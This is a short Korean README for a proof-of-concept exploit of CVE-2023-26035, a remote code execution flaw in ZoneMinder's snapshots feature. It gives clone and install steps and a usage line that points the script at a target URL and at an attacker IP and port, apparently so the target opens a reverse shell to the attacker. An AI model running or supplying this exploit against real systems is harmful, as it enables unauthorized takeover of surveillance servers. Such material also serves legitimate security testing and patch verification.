
이것은 CVE-2023-26035에 설명된 Zoneminder의 보안 취약점을 악용할 수 있는 Python으로 작성된 스크립트입니다.
이것은 CVE-2023-26035에 설명된 Zoneminder의 보안 취약점을 악용할 수 있는 Python으로 작성된 스크립트입니다. 이 시스템은 1.36.33 및 1.37.33 이전 버전에서 취약합니다.
저장소를 머신에 클론하고 pip를 사용하여 의존성을 설치하세요 (이 설치를 전역 설치와 분리하려면 virtualenv를 사용하여 환경을 만드는 것이 좋습니다)
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
스크립트에는 Zoneminder의 루트 경로가 포함된 대상 URL이 필요합니다 (예: http://example.com/zm, http://example.com 또는 http://example.com/zoneminder), 대상 머신이 연결할 IP 또는 도메인과 대상 머신이 연결할 포트가 필요합니다. 예시는 다음과 같습니다:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443
